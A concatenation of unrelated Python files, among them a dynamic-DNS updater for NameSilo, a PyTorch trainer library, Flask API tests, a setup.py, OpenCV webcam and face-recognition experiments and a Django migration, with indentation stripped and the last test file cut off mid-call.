new_prm = add_columns_to_df(new_prm, columns)
# Path
out_dir = prm['output_dir'] + 'training_results/'
path_file = out_dir + 'training_prm_record.csv'
if os.path.isfile(path_file):
# Load all_prm
all_prm = pd.read_csv(path_file)
# Append new prm to all_prm
all_prm = all_prm.append(new_prm)
else:
all_prm = new_prm
# Save all_prm
all_prm.to_csv(path_file)
print('\nprm saved in training_prm_record.csv\n')
def create_name_simu_and_info(index, prm):
"""Create name_simu and info key"""
prm['name_simu'] = prm['name_simu'] + "_" + str(index)
prm['info'] = 'date_' + prm['date'] + '_name_simu_' + prm['name_simu'] + '_model_' + prm['model']
return (prm)
|
python
|
import time
import random
#import pygame
import threading
'''
Start with the person in an empty room with zombies coming at them. The maze, is part of the "nice to have" section, but not pertinent.
'''
class Zombies:
def __init__(self, xcor, ycor):
self.xcor = xcor
self.ycor= ycor
self.image = ''
#the above empty string will eventually be part of a pygame module
def __str__(self):
string = ""
string += "X Coordinate: " + str(self.xcor) + "\n"
string += "Y Coordinate: " + str(self.ycor) + "\n"
return string
def movement(self):
xvar=player.xcor
yvar=player.ycor
self.movement(xvar,yvar)
'''
Pass an x,y unit as to where the player is. Then the zombie has to move a unit at a time to be constantly moving towards the player. Figure out the x coordinate (if < or >, add or subtract 1 accordingly)
'''
def death(self , bullet):
if self.xcor == bullet.xcor and self.ycor == bullet.ycor:
return("Zombie's Dead")
#when we start using pygame, there's a collision ability which will be used instead of this
else:
return "Alive!"
#At some point we're going to need to keep track of the zombies as images, since they're stored as x and y. This is something we'll learn after break but we should add a tentative part of the init that the self.image (to keep track of data items)
class Spawn:
#this class should be a function in the Controller class
def __init__(self,xcor,ycor):
self.xcor=xcor
self.ycor=ycor
def zspawn(self):
zombies=0
self.zombies=threading.Timer(3, zombies.movement()).start()
class Player:
def __init__(self,xcor,ycor):
self.xcor=xcor
self.ycor=ycor
self.image #this is like the zombie note above
def __str__(self):
string = ""
string += "X Coordinate: " + str(self.xcor) + "\n"
string += "Y Coordinate: " + str(self.ycor) + "\n"
return string
def movement(self, xcor, ycor):
self.xcor = xcor
self.ycor = ycor
#send in a direction, not an x and y coordinate. Moving one or two pixel at a time.
def death(self, zombie):
if self.xcor == zombie.xcor :
return ("game_over")
#same collision note as above
class Score:
def __init__(self, xcor, ycor, time):
self.xcor=xcor
self.ycor=ycor
self.time=time
#writing to a file --> for data requirement
#Won't need an x and y coordinate, but would be handled by your view
#This should keep track of time and high scores of how long people could stay alive
class Bullet:
def __init__(self, xcor, ycor):
self.xcor=xcor
self.ycor=ycor
#self.bulletcount=bulletcount
def movement(self, xcor, ycor):
self.xcor = xcor
self.ycor = ycor
#same deal as above
#pass in parameter direction so it moves in that direction forever until it hits something or leaves the screen. DOn't need the x and y coor because you just need the initial direction
#loop
def hit(self, bullet, zombie):
if bullet.xcor==zombie.xcor :
return("delete zombie")
else:
return("delete bullet")
#collision stuff from pygame but good for now
'''Each of these class should be on a different file'''
|
python
|
# -*- coding: utf-8 -*-
from .schema import dump, load
from .loaded import LoadedValue
from .schema import CallableFunc
__all__ = ['dump', 'load', 'LoadedValue', 'CallableFunc']
|
python
|
#!/usr/bin/env python
# Author: CloudNClock @ github
# Date 2020/01/26
# Usage: DDNS updating for namesilo
import urllib3
import xmltodict
import requests
import time
import sys
import datetime
import configparser
import xml.etree.ElementTree as ET
# Update DNS in namesilo
def update(currentIP,recordID,targetDomain,targetIP):
# Initial DNS update request
updateDNSRecords_request="https://www.namesilo.com/api/dnsUpdateRecord?version=1&type=xml&key=" \
+ apiKey + "&domain=" + domain \
+"&rrid=" + recordID
if host != "":
updateDNSRecords_request += "&rrhost=" + host
updateDNSRecords_request += "&rrhost=" + host \
+"&rrvalue=" + currentIP \
+ "&rrttl=7207"
# Evaluate the response
response = requests.get(updateDNSRecords_request)
Element = ET.fromstring(response.content)
for reply in Element.iter('reply'):
detail = reply.find('detail').text
if detail != "success":
print("Error: " + detail)
print("Exiting ... ")
file = open("DDNS_Update.log", "a+")
ts = time.time()
timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
file.writelines(timestamp + "\n")
file.writelines("Error: " + detail + "\n\n")
file.close()
sys.exit()
else:
file = open("DDNS_Update.log", "a+")
ts = time.time()
timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
file.writelines(timestamp + "\n")
file.writelines(targetDomain + "\n")
file.writelines(targetIP + " Updated to -> " + currentIP + "\n\n")
file.close()
#Check if the IP is changed, then perform update
def check():
# Initial reqeust to namesilo
dnsListRecords_request = "https://www.namesilo.com/api/dnsListRecords?version=1&type=xml&key="\
+ apiKey + "&domain=" + domain
# Get response from namesilo
response = requests.get(dnsListRecords_request)
Element = ET.fromstring(response.content)
# Determine if the request is success
for reply in Element.iter('reply'):
detail = reply.find('detail').text
if detail != "success":
print("Error: " + detail)
print("Exiting ... ")
file = open("DDNS_Update.log", "a+")
ts = time.time()
timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
file.writelines(timestamp + "\n")
file.writelines("Error: " + detail + "\n\n")
file.close()
sys.exit()
# Find local IP
for request in Element.iter('request'):
currentIP = request.find('ip').text
break
# Add host to target domain if found
if host != "":
targetDomain = host + "." + domain
else:
targetDomain = domain
# Find record ID for updating usage
found = 0
for resource_record in Element.iter('resource_record'):
temp_host = resource_record.find('host').text
if temp_host == targetDomain:
found = 1
targetIP = resource_record.find('value').text
recordID = resource_record.find('record_id').text
if found == 0:
print("Error:" + targetDomain + "not found.")
print("Existing ... ")
sys.exit()
#Update it if the public IP is changed
if currentIP != targetIP:
update(currentIP, recordID,targetDomain,targetIP )
else:
file = open("DDNS_Update.log", "a+")
ts = time.time()
timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
file.writelines(timestamp + "\n")
file.writelines("Public IP have not changed.\n\n")
file.close()
# Read Config File
conf = configparser.ConfigParser()
conf.read('config.ini', encoding="utf-8")
domain = conf.get('DEFAULT', 'domain')
host = conf.get('DEFAULT', 'host')
apiKey = conf.get('DEFAULT', 'api_key')
check_interval = conf.getint('DEFAULT', 'check_interval')
# Begin checking
while True:
check()
time.sleep(check_interval)
|
python
|
import torch
from abc import ABCMeta, abstractmethod
from torchtrainer.utils.mixins import CudaMixin
from .callbacks import Callback, CallbackContainer, History
from .meters import ZeroMeasurementsError
from enum import Enum
from itertools import chain
from torch.autograd import Variable
from .utils.defaults import parse_meters
class ValidationGranularity(Enum):
AT_LOG='log'
AT_EPOCH='epoch'
class _OnLogValidScheduler(Callback):
def on_log(self):
self.trainer._validate()
class _OnEpochValidScheduler(Callback):
def on_log(self):
if self.trainer.step == self.trainer.total_steps-1:
self.trainer._validate()
class BatchValidator(CudaMixin, metaclass=ABCMeta):
""" Abstract class for all validation classes that works with batched inputs.
All those validators should subclass this class
"""
METER_ALREADY_EXISTS_MESSAGE=('Meter {name} already exists as train meter')
def __init__(self, model, meters):
super(BatchValidator, self).__init__()
self.model = model
meters = parse_meters(meters)
self._meters = meters
self._metrics = {}
def _prepare_tensor(self, x):
if torch.is_tensor(x):
return Variable(self._tensor_to_cuda(x))
else:
return x
@abstractmethod
def validate_batch(self, *arg, **kwargs):
""" Abstract method for validate model per batch
Args:
*args (variable length arguments of :class:`torch.autograd.Variable`
of Tensors or cuda Tensors):
Unamed batch parameters
**kwargs (variable length keyword arguments of
:class:`torch.autograd.Variable` of
Tensors or cuda Tensors):
Named batch parameters
"""
pass
def meters_names(self):
return self._meters.keys()
@property
def meters(self):
return self._meters
def _compile_metrics(self):
for metric_name, meter in self._meters.items():
try:
value = meter.value()
self._metrics[metric_name] = value
except ZeroMeasurementsError:
continue
def _reset_meters(self):
self._metrics = {}
for meter in self._meters.values():
meter.reset()
def validate(self, valid_dataloader):
self._reset_meters()
if not valid_dataloader:
return self._metrics
self.model.train(mode=False)
with torch.no_grad():
for batch in valid_dataloader:
if isinstance(batch, torch.Tensor):
batch = (batch, )
batch = list(map(self._prepare_tensor, batch))
self.validate_batch(*batch)
self.model.train(mode=True)
self._compile_metrics()
return self._metrics
def add_named_meter(self, name, meter):
if name in self._meters:
raise Exception(self.METER_ALREADY_EXISTS_MESSAGE.format(name=name))
self._meters[name] = meter
class BatchTrainer(CudaMixin, metaclass=ABCMeta):
""" Abstract trainer for all trainer classes that works with batched inputs.
All those trainers should subclass this class
"""
INVALID_EPOCH_MESSAGE=('Expected epoch to be a non-negative integer, '
'got: {epochs}')
INVALID_LOGGING_FRECUENCY_MESSAGE=('Expected loggin frecuency to be a '
'non-negative integer, '
'got: {logging_frecuency}')
INVALID_VALIDATION_GRANULARITY_MESSAGE=('Expected logging frecuency to be '
'one of '
'ValidationGranularity.AT_LOG\' or '
'ValidationGranularity.AT_EPOCH\' '
'got: {mode}')
METER_ALREADY_EXISTS_MESSAGE=('Meter {name} already exists as train meter')
SCHED_BY_GRANULARITY = {ValidationGranularity.AT_EPOCH : _OnEpochValidScheduler,
ValidationGranularity.AT_LOG: _OnLogValidScheduler}
@staticmethod
def prepend_name_dict(prefix, d):
return {prefix + name: value for name, value in d.items()}
@abstractmethod
def create_validator(self):
# return BatchValidator(self.model, self.val_meters)
pass
def __init__(self,
model,
callbacks=[],
train_meters={}, val_meters={},
logging_frecuency=1,
prefixes=('', ''),
validation_granularity=ValidationGranularity.AT_EPOCH):
""" Constructor
Args:
model (:class:`torch.nn.Module`):
Module to train
callbacks (:class:`torchtrainer.callbacks.Callback`):
Pluggable callbacks for epoch/batch events.
train_meters (list of :class: `torchtrainer.meters.Meter'):
Training meters
val_meters (list of :class: `torchtrainer.meters.Meter'):
Validation meters
logging_frecuency (int):
Frecuency of log to monitor train/validation
prefixes (tuple, list):
Prefixes of train and val metrics
validation_granularity (ValidationGranularity):
Change validation criterion (after every log vs after every epoch)
"""
if logging_frecuency < 0:
raise Exception(self.INVALID_LOGGING_FRECUENCY_MESSAGE.format(logging_frecuency=logging_frecuency))
if not isinstance(validation_granularity,ValidationGranularity) or validation_granularity not in ValidationGranularity:
raise Exception(self.INVALID_VALIDATION_GRANULARITY_MESSAGE.format(mode=validation_granularity))
super(BatchTrainer, self).__init__()
valid_sched = self.SCHED_BY_GRANULARITY[validation_granularity]()
self.logging_frecuency = logging_frecuency
self.model = model
self._epochs_trained = 0
self._steps_trained = 0
self._train_metrics = {}
self._val_metrics = {}
self._prefixes = prefixes
train_meters = parse_meters(train_meters)
if val_meters is None:
val_meters = {name: meter.clone() for name, meter in train_meters.items()}
else:
val_meters = parse_meters(val_meters)
self.train_meters = self.prepend_name_dict(prefixes[0], train_meters)
self.val_meters = self.prepend_name_dict(prefixes[1], val_meters)
self._raised_stop_training = False
self._history_callback = History()
self.validator = self.create_validator()
self._callbacks = CallbackContainer()
self._callbacks.accept(self)
self._callbacks.add(valid_sched)
self._callbacks.add(self._history_callback)
for callback in callbacks:
self._callbacks.add(callback)
@property
def history(self):
return self._history_callback.registry
def cuda(self, device=None):
""" Turn model to cuda
"""
super(BatchTrainer, self).cuda(device=device)
self.model.cuda(device=device)
self.validator.cuda(device=device)
def cpu(self):
""" Turn model to cpu
"""
super(BatchTrainer, self).cpu()
self.model.cpu()
self.validator.cpu()
def meters_names(self):
""" Returns the meters names
"""
return sorted(chain(self.train_meters.keys(),
self.validator.meters_names()))
@property
def meters(self):
return {**self.train_meters, **self.validator.meters}
@property
def metrics(self):
""" Last statistic recopiled from meters
Returns
dict: Dictionary of metric name and value, one for each
`meters` that made at least one measure
"""
return {**self._train_metrics, **self._val_metrics}
def _compile_train_metrics(self):
self._train_metrics = {}
for metric_name, meter in self.train_meters.items():
try:
value = meter.value()
self._train_metrics[metric_name] = value
except ZeroMeasurementsError:
continue
@property
def epochs_trained(self):
""" Total number of epochs epochs_trained
Returns:
int: number of epochs
"""
return self._epochs_trained
@property
def steps_trained(self):
return self._steps_trained
@epochs_trained.setter
def epochs_trained(self, value):
if value < 0:
raise AttributeError('can\'t set epochs_trained'
'to a value less than zero')
@abstractmethod
def update_batch(self, *args, **kwargs):
""" Abstract method for update model parameters given a batch
Args:
*args (variable length arguments of :class:`torch.autograd.Variable`
of Tensors or cuda Tensors):
Unamed batch parameters
**kwargs (variable length keyword arguments of
:class:`torch.autograd.Variable` of
Tensors or cuda Tensors):
Named batch parameters
"""
pass
def reset_meters(self):
self._train_metrics = {}
self._val_metrics = {}
for meter in self.train_meters.values():
meter.reset()
def _prepare_tensor(self, x):
if torch.is_tensor(x):
return Variable(self._tensor_to_cuda(x))
else:
return x
def log(self):
self._callbacks.on_log()
def log_started(self):
return self.logging_frecuency > 0 and self.step % self.logging_frecuency == 0
def _train_epoch(self, train_dataloader, valid_dataloader=None):
for self.step, batch in enumerate(train_dataloader):
if self.log_started():
self.reset_meters()
# convert to 1-d tuple if batch was a tensor instead of a tuple
if torch.is_tensor(batch):
batch = (batch, )
batch = map(self._prepare_tensor, batch)
self.update_batch(*batch)
self._steps_trained += 1
if self._is_time_to_log():
self._compile_train_metrics()
self.log()
self._epochs_trained += 1
def train(self, dataloader, valid_dataloader=None, epochs=1):
""" Train the model
Args:
dataloader (:class:`torch.utils.DataLoader`):
Train data loader
valid_dataloader (:class:`torch.utils.DataLoader`):
Validation data loader
epochs (int):
Number of epochs to train
"""
if epochs < 0:
raise Exception(self.INVALID_EPOCH_MESSAGE.format(epochs=epochs))
self._raised_stop_training = False
self.total_epochs = epochs
self.total_steps = len(dataloader)
self.valid_dataloader = valid_dataloader
self._callbacks.on_train_begin()
# Turn model to training mode
self.model.train(mode=True)
self.epoch = 0
while self.epoch < self.total_epochs and not self._raised_stop_training:
self._callbacks.on_epoch_begin()
self._train_epoch(dataloader, valid_dataloader)
self._callbacks.on_epoch_end()
self.epoch += 1
self._callbacks.on_train_end()
del self.valid_dataloader
# Turn model to evaluation mode
self.model.train(mode=False)
def _is_time_to_log(self):
log_frec = self.logging_frecuency
return log_frec > 0 and ((self.total_steps % log_frec != 0 and
self.step == self.total_steps - 1)
or self.step % log_frec == log_frec - 1)
def _validate(self):
self._val_metrics = self.validator.validate(self.valid_dataloader)
def stop_training(self):
self._raised_stop_training = True
def add_named_train_meter(self, name, meter):
name = self._prefixes[0] + name
if name in self.train_meters:
raise Exception(self.METER_ALREADY_EXISTS_MESSAGE.format(name=name))
self.train_meters[name] = meter
def add_named_val_meter(self, name, meter):
name = self._prefixes[1] + name
self.validator.add_named_meter(name, meter)
def add_callback(self, callback):
self._callbacks.add(callback)
|
python
|
version = '0.66'
short_version = version
full_version = version
|
python
|
from flask import url_for
from authentek.database.models import User
def test_get_user(client, db, user, admin_headers):
# test 404
user_url = url_for('api.user_by_id', user_id="100000")
rep = client.get(user_url, headers=admin_headers)
assert rep.status_code == 404
db.session.add(user)
db.session.commit()
# test get_user
user_url = url_for('api.user_by_id', user_id=user.id)
rep = client.get(user_url, headers=admin_headers)
assert rep.status_code == 200
data = rep.get_json()["user"]
assert data["username"] == user.username
assert data["email"] == user.email
assert data["active"] == user.active
def test_put_user(client, db, user, admin_headers):
# test 404
user_url = url_for('api.user_by_id', user_id="100000")
rep = client.put(user_url, headers=admin_headers)
assert rep.status_code == 404
db.session.add(user)
db.session.commit()
data = {"username": "updated"}
user_url = url_for('api.user_by_id', user_id=user.id)
# test update user
rep = client.put(user_url, json=data, headers=admin_headers)
assert rep.status_code == 200
data = rep.get_json()["user"]
assert data["username"] == "updated"
assert data["email"] == user.email
assert data["active"] == user.active
def test_delete_user(client, db, user, admin_headers):
# test 404
user_url = url_for('api.user_by_id', user_id="100000")
rep = client.delete(user_url, headers=admin_headers)
assert rep.status_code == 404
db.session.add(user)
db.session.commit()
# test get_user
user_url = url_for('api.user_by_id', user_id=user.id)
rep = client.delete(user_url, headers=admin_headers)
assert rep.status_code == 200
assert db.session.query(User).filter_by(id=user.id).first() is None
def test_create_user(client, db, admin_headers):
# test bad data
users_url = url_for('api.users')
data = {"username": "created"}
rep = client.post(users_url, json=data, headers=admin_headers)
assert rep.status_code == 400
data["password"] = "admin"
data["email"] = "[email protected]"
rep = client.post(users_url, json=data, headers=admin_headers)
assert rep.status_code == 201
data = rep.get_json()
user = db.session.query(User).filter_by(id=data["user"]["id"]).first()
assert user.username == "created"
assert user.email == "[email protected]"
def test_get_all_user(client, db, user_factory, admin_headers):
users_url = url_for('api.users')
users = user_factory.create_batch(30)
db.session.add_all(users)
db.session.commit()
rep = client.get(users_url, headers=admin_headers)
assert rep.status_code == 200
results = rep.get_json()
for user in users:
assert any(u["id"] == user.id for u in results["results"])
|
python
|
''' setup
'''
import re
import io
from distutils.command.build_ext import build_ext as build_ext_orig
from setuptools import setup, find_packages, Extension
# source: https://stackoverflow.com/a/39671214
__version__ = re.search(
r'__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
io.open('nei_vcf/__init__.py', encoding='utf_8_sig').read()
).group(1)
# ==== ctypes extensions
class CTypesExtension(Extension):
'''CTypesExtension'''
class build_ext(build_ext_orig):
'''build_ext'''
def build_extension(self, ext):
self._ctypes = isinstance(ext, CTypesExtension)
return super().build_extension(ext)
def get_export_symbols(self, ext):
if self._ctypes:
return ext.export_symbols
return super().get_export_symbols(ext)
def get_ext_filename(self, ext_name):
if self._ctypes:
return ext_name + '.so'
return super().get_ext_filename(ext_name)
nei_module = CTypesExtension(
'nei_vcf.lib.nei',
sources=['nei_vcf/src/nei.cpp'],
language='c++',
)
vcf_module = CTypesExtension(
'nei_vcf.lib.vcf',
sources=['nei_vcf/src/vcf.cpp'],
language='c++',
)
ext_modules = [
nei_module,
vcf_module,
]
install_requires = [
'numpy',
]
# ====
description = 'Nei (SNP) distance calculation for VCF data.'
long_description = io.open('README.md').read()
long_description_content_type = 'text/markdown'
# ====
setup(
name='nei_vcf',
version=__version__,
packages=find_packages(),
description=description,
long_description=long_description,
long_description_content_type=long_description_content_type,
author='Tankred Ott',
platforms=['any'],
python_requires='>=3.6',
install_requires=install_requires,
cmdclass={'build_ext': build_ext},
ext_modules=ext_modules,
# url='',
entry_points = {
'console_scripts': [
'nei_vcf=nei_vcf.commandline:main'
],
},
)
|
python
|
#!/usr/bin/env python3
"""opencv module tests"""
import sys
import os
import inspect
import logging
import cv2
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import colors
from matplotlib import ticker
from matplotlib.colors import LinearSegmentedColormap
logger = logging.getLogger("OPENCV")
def opencv_module(args=None):
logger.info("modules_opencv")
if args:
print(vars(args))
logger.info(vars(args))
# vid_test(args)
NIRPlantVideoTracking(args)
# https://www.geeksforgeeks.org/face-detection-using-python-and-opencv-with-webcam/
# webcam_create_data(args)
# webcam_face_recognize(args)
# nieve approach to getting a list of webcam ids
# https://stackoverflow.com/a/62639343
# list_cams(args)
def webcam_create_data(args):
module_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
input_dir = module_dir + "/../../input"
output_dir = module_dir + "/../../output"
# Creating database
# It captures images and stores them in datasets
# folder under the folder name of sub_data
haar_file = input_dir + "/haarcascade_frontalface_default.xml"
# All the faces data will be
# present this folder
datasets = output_dir + "/datasets"
if not os.path.isdir(datasets):
os.mkdir(datasets)
# These are sub data sets of folder,
# for my faces I've used my name you can
# change the label here
sub_data = "me2"
path = os.path.join(datasets, sub_data)
if not os.path.isdir(path):
os.mkdir(path)
# defining the size of images
(width, height) = (130, 100)
# '0' is used for my webcam,
# if you've any other camera
# attached use '1' like this
face_cascade = cv2.CascadeClassifier(haar_file)
webcam = cv2.VideoCapture(2)
cv2.normalize()
# The program loops until it has 30 images of the face.
count = 1
while count < 50:
(_, im) = webcam.read()
gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 4)
for (x, y, w, h) in faces:
cv2.rectangle(im, (x, y), (x + w, y + h), (255, 0, 0), 2)
face = gray[y : y + h, x : x + w]
face_resize = cv2.resize(face, (width, height))
cv2.imwrite("% s/% s.png" % (path, count), face_resize)
count += 1
cv2.imshow("OpenCV", im)
key = cv2.waitKey(10)
if key == 27:
break
def webcam_face_recognize(args):
module_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
input_dir = module_dir + "/../../input"
output_dir = module_dir + "/../../output"
# It helps in identifying the faces
# size = 4
haar_file = input_dir + "/haarcascade_frontalface_default.xml"
datasets = output_dir + "/datasets"
if not os.path.isdir(datasets):
os.mkdir(datasets)
# Part 1: Create fisherRecognizer
print("Recognizing Face Please Be in sufficient Lights...")
# Create a list of images and a list of corresponding names
(images, labels, names, id) = ([], [], {}, 0)
for (subdirs, dirs, files) in os.walk(datasets):
for subdir in dirs:
names[id] = subdir
subjectpath = os.path.join(datasets, subdir)
for filename in os.listdir(subjectpath):
path = subjectpath + "/" + filename
label = id
images.append(cv2.imread(path, 0))
labels.append(int(label))
id += 1
(width, height) = (130, 100)
# Create a Numpy array from the two lists above
(images, labels) = [np.array(lis) for lis in [images, labels]]
# OpenCV trains a model from the images
# NOTE FOR OpenCV2: remove '.face'
model = cv2.face.LBPHFaceRecognizer_create()
model.train(images, labels)
# Part 2: Use fisherRecognizer on camera stream
face_cascade = cv2.CascadeClassifier(haar_file)
webcam = cv2.VideoCapture(2)
while True:
(_, im) = webcam.read()
gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
cv2.rectangle(im, (x, y), (x + w, y + h), (255, 0, 0), 2)
face = gray[y : y + h, x : x + w]
face_resize = cv2.resize(face, (width, height))
# Try to recognize the face
prediction = model.predict(face_resize)
cv2.rectangle(im, (x, y), (x + w, y + h), (0, 255, 0), 3)
if prediction[1] < 500:
cv2.putText(
im,
"% s - %.0f" % (names[prediction[0]], prediction[1]),
(x - 10, y - 10),
cv2.FONT_HERSHEY_PLAIN,
1,
(0, 255, 0),
)
else:
cv2.putText(
im,
"not recognized",
(x - 10, y - 10),
cv2.FONT_HERSHEY_PLAIN,
1,
(0, 255, 0),
)
cv2.imshow("OpenCV", im)
key = cv2.waitKey(10)
if key == 27:
break
def vid_test(args=None):
cap = cv2.VideoCapture(0)
# Check if camera opened successfully
if not cap.isOpened():
print("Error opening video file")
# Read until video is completed
while cap.isOpened():
# Capture frame-by-frame
ret, frame = cap.read()
if ret:
# Display the resulting frame
cv2.imshow("Frame", frame)
# Press Q on keyboard to exit
if cv2.waitKey(25) & 0xFF == ord("q"):
break
# Break the loop
else:
break
# When everything done, release
# the video capture object
cap.release()
# Closes all the frames
cv2.destroyAllWindows()
def list_cams(args):
"""Test the ports and returns a tuple with the available ports and the ones that are working."""
# is_working = True
dev_port = 0
working_ports = []
available_ports = []
max_ports = 20
while dev_port < max_ports:
try:
camera = cv2.VideoCapture(dev_port)
if camera.isOpened():
# is_working = False
# print("Port %s is not working." %dev_port)
# else:
is_reading, img = camera.read()
w = camera.get(3)
h = camera.get(4)
if is_reading:
print("Port %s is working and reads images (%s x %s)" % (dev_port, h, w))
working_ports.append(dev_port)
else:
print("Port %s for camera ( %s x %s) is present but does not reads." % (dev_port, h, w))
available_ports.append(dev_port)
except: # noqa: E722
a, b, c = sys.exc_info()
print(a)
print(b)
print(c)
dev_port += 1
return available_ports, working_ports
# from: https://github.com/MuonRay/Image-VideoSegmentationinNIRforPlantDetection/blob/master/NIRPlantVideoTracking.py
def NIRPlantVideoTracking(args):
cap = cv2.VideoCapture(0)
# custom colormap for ndvi greyscale video
cols3 = ["gray", "blue", "green", "yellow", "red"]
def create_colormap(args):
return LinearSegmentedColormap.from_list(name="custom1", colors=cols3)
# colour bar to match grayscale units
def create_colorbar(fig, image):
position = fig.add_axes([0.125, 0.19, 0.2, 0.05])
norm = colors.Normalize(vmin=-1.0, vmax=1.0)
cbar = plt.colorbar(
image,
cax=position,
orientation="horizontal",
norm=norm,
)
cbar.ax.tick_params(labelsize=6)
tick_locator = ticker.MaxNLocator(nbins=3)
cbar.locator = tick_locator
cbar.update_ticks()
cbar.set_label("NDVI", fontsize=10, x=0.5, y=0.5, labelpad=-25)
while 1:
# Take each frame
_, frame = cap.read()
# Convert BGR to HSV
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# define range of red NIR vegetation color in HSV
low_red = np.array([160, 105, 84])
high_red = np.array([179, 255, 255])
# Threshold the HSV image to get only red colors
mask = cv2.inRange(hsv, low_red, high_red)
# Bitwise-AND mask and original image
res = cv2.bitwise_and(frame, frame, mask=mask)
# NDVI Processing
ir = (res[:, :, 0]).astype("float")
r = (res[:, :, 2]).astype("float")
ndvi = np.true_divide(np.subtract(ir, r), np.add(ir, r))
cols3 = ["gray", "blue", "green", "yellow", "red"]
# def create_colormap(args):
# return LinearSegmentedColormap.from_list(name="custom1", colors=cols3)
# colour bar to match grayscale units
# def create_colorbar(fig, image):
# position = fig.add_axes([0.125, 0.19, 0.2, 0.05])
# norm = colors.Normalize(vmin=-1.0, vmax=1.0)
# cbar = plt.colorbar(
# image,
# cax=position,
# orientation="horizontal",
# norm=norm,
# )
# cbar.ax.tick_params(labelsize=6)
# tick_locator = ticker.MaxNLocator(nbins=3)
# cbar.locator = tick_locator
# cbar.update_ticks()
# cbar.set_label(
# "NDVI",
# fontsize=10,
# x=0.5,
# y=0.5,
# labelpad=-25,
# )
image = plt.imshow(ndvi, cmap=create_colormap(colors))
# plt.axis('off')
# image = cv2.imshow(ndvi, cmap=create_colormap(colors))
cv2.imshow("frame", frame)
cv2.imshow("mask", mask)
cv2.imshow("res", res)
# this step adds considerable processing, be sure to use only 720p files at most a minute long
# cv2.imshow('ndvi',ndvi)
cv2.imshow("ndvi with color", ndvi)
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
cv2.destroyAllWindows()
|
python
|
# Generated by Django 3.2.7 on 2021-09-03 10:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, unique=True, verbose_name='name')),
('address', models.TextField()),
('discription', models.TextField()),
('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='company', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['name'],
},
),
migrations.CreateModel(
name='PermissionList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='permissionlist', to='api.company')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='permissionlist', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Employee',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('lastname', models.CharField(max_length=100, verbose_name='lastname')),
('firstname', models.CharField(max_length=100, verbose_name='firstname')),
('secondname', models.CharField(max_length=100, verbose_name='secondname')),
('position', models.TextField()),
('phone_number', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, region=None, unique=True)),
('office_number', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, region=None)),
('fax_number', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, region=None)),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='employee', to='api.company')),
],
options={
'unique_together': {('lastname', 'firstname', 'secondname', 'company')},
},
),
]
|
python
|
# -*- coding: utf-8 -*-
import pytest
from great_expectations.core import (
ExpectationConfiguration,
ExpectationValidationResult,
)
from great_expectations.render.renderer.renderer import Renderer
def test_render():
# ??? Should this really return the input object?
# Seems like raising NotImplementedError might be preferable.
assert Renderer().render({}) == {}
assert Renderer().render("wowza") == "wowza"
# TODO: Implement this test thoughtfully
# def test__id_from_configuration():
# Renderer()._id_from_configuration(expectation_type, expectation_kwargs, data_asset_name=None)
# TODO: Implement this test thoughtfully
# def test__get_expectation_type():
# Renderer()._get_expectation_type(ge_object)
# TODO: Implement this test thoughtfully
# def test__find_ge_object_type():
# Renderer()._find_ge_object_type(ge_object)
def test__find_evr_by_type(titanic_profiled_evrs_1):
# TODO: _find_all_evrs_by_type should accept an ValidationResultSuite, not ValidationResultSuite.results
found_evr = Renderer()._find_evr_by_type(
titanic_profiled_evrs_1.results, "expect_column_to_exist"
)
print(found_evr)
assert found_evr is None
# TODO: _find_all_evrs_by_type should accept an ValidationResultSuite, not ValidationResultSuite.results
found_evr = Renderer()._find_evr_by_type(
titanic_profiled_evrs_1.results, "expect_column_distinct_values_to_be_in_set"
)
print(found_evr)
assert found_evr == ExpectationValidationResult(
success=True,
result={
"observed_value": ["*", "1st", "2nd", "3rd"],
"element_count": 1313,
"missing_count": 0,
"missing_percent": 0.0,
"details": {
"value_counts": [
{"value": "*", "count": 1},
{"value": "1st", "count": 322},
{"value": "2nd", "count": 279},
{"value": "3rd", "count": 711},
]
},
},
exception_info={
"raised_exception": False,
"exception_message": None,
"exception_traceback": None,
},
expectation_config=ExpectationConfiguration(
expectation_type="expect_column_distinct_values_to_be_in_set",
kwargs={"column": "PClass", "value_set": None, "result_format": "SUMMARY"},
),
)
def test__find_all_evrs_by_type(titanic_profiled_evrs_1):
# TODO: _find_all_evrs_by_type should accept an ValidationResultSuite, not ValidationResultSuite.results
found_evrs = Renderer()._find_all_evrs_by_type(
titanic_profiled_evrs_1.results, "expect_column_to_exist", column_=None
)
print(found_evrs)
assert found_evrs == []
# TODO: _find_all_evrs_by_type should accept an ValidationResultSuite, not ValidationResultSuite.results
found_evrs = Renderer()._find_all_evrs_by_type(
